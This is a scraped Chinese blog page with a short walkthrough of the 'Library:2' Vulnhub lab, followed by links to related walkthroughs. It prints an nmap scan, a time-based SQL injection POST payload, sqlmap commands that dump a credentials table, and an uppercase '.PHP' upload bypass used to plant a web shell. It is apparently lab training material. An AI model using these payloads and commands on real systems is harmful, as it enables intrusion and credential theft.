The Library:2 Vulnhub Walkthrough
主机层面扫描探测:
╰─ nmap -p1-65535 -sV -A 10.10.202.132
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 09:10 CST
Nmap scan report for 10.10.202.132
Host is up (0.00087s latency).
Not shown: 55531 filtered ports, 10002 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:07:37:5D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: OS: Unix
web目录枚举
╰─ dirb http://10.10.202.132 -X.php
---- Scanning URL: http://10.10.202.132/ ----
+ http://10.10.202.132/library.php (CODE:200|SIZE:1546)
http://10.10.202.132/library.php
http://10.10.202.132/library.php?country=Netherlands #true
http://10.10.202.132/library.php?country=Netherlands' #false
验证是否存在注入漏洞
经过尝试,需要更改HTTP的请求方式为:POST
POST /library.php HTTP/1.1
Host: 10.10.202.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=sklv0krnnccv6ugcvp568fdqo7
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
country=England' and if(substr(@@version,1,1)=5,sleep(5),1)--+
复制到文本文件,使用SQLmap 进行注入
╰─ sqlmap -r target.txt --risk 3 --level 5 --batch
╰─ sqlmap -r target.txt --risk 3 --level 5 --batch --tables -D library -T access -C password,service,username --dump
AroundTheWorld | ftp | globus
上传php后缀无法上传,更改后缀为PHP,成功绕过上传限制
http://10.10.202.132/shell.PHP
本地监听
进行提权操作
完!
The Library:2 Vulnhub Walkthrough的更多相关文章
- library: Vulnhub Walkthrough
网络主机探测: 端口主机扫描: ╰─ nmap -p1-65535 -sV -A -O -sT 10.10.202.136 21/tcp open ftp vsftpd 3.0.380/tcp ope ...
- HA Joker Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...
- HA: ISRO Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...
- LAMPSecurity: CTF6 Vulnhub Walkthrough
镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...
- Hacker Fest: 2019 Vulnhub Walkthrough
靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...
- DC8: Vulnhub Walkthrough
镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...
- HA: Infinity Stones Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...
- Sunset: Nightfall Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...
- Dc:7 Vulnhub Walkthrough
靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...
随机推荐
- C#DateTime格式转换全介绍
DateTime与字符串转换: DateTime()与转换为字符串主要依靠DateTime().ToString(string format) 函数,以我的理解,参数format大体分为单个字母和多个 ...
- KETTLE教程实战
kettle初探 Kettle简介:Kettle是一款国外开源的ETL工具,纯java编写,可以在Window.Linux.Unix上运行,数据抽取高效稳定.Kettle 中文名称叫水壶,该项目的主程 ...
- luogu P2740 [USACO4.2]草地排水Drainage Ditches |网络流
题目背景 在农夫约翰的农场上,每逢下雨,贝茜最喜欢的三叶草地就积聚了一潭水.这意味着草地被水淹没了,并且小草要继续生长还要花相当长一段时间.因此,农夫约翰修建了一套排水系统来使贝茜的草地免除被大水淹没 ...
- 趁热来一波,WWDC 2016 iMessage App开发
转自:http://www.jianshu.com/p/be79b8729bf8 WWDC 2016关于iMessage App的两个视频已经放出(iMessage Apps and Stickers ...
- IOS UISwitch 控件
转自:http://my.oschina.net/wolx/blog/396680 一 UISwitch 简介 二 UISwitch 创建 三设置选中状态 四 添加监听 五 测试代码 5.1 代码 5 ...
- iOS开发笔试面试- KVC/KVO简单使用
转自:http://my.oschina.net/caijunrong/blog/510701 一.对于KVC模式(Key Value Coding): 1.其实在实际开发中用得比较多得就是:接收到j ...
- [TimLinux] JavaScript 元素动态显示
1. css的opacity属性 这个属性用于:设置元素的不透明级别,取值范围:从 0.0 (完全透明)到 1.0(完全不透明),元素所在的文本流还在.这个属性的动态变化可以用来设置元素的淡入淡出效果 ...
- HDU2767 Proving Equivalences(加边变为强联通图)
Proving Equivalences Time Limit: 4000/2000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Oth ...
- UVA-11995
There is a bag-like data structure, supporting two operations:1 x Throw an element x into the bag.2 ...
- (全国多校重现赛一)E-FFF at Valentine
At Valentine's eve, Shylock and Lucar were enjoying their time as any other couples. Suddenly, LSH, ...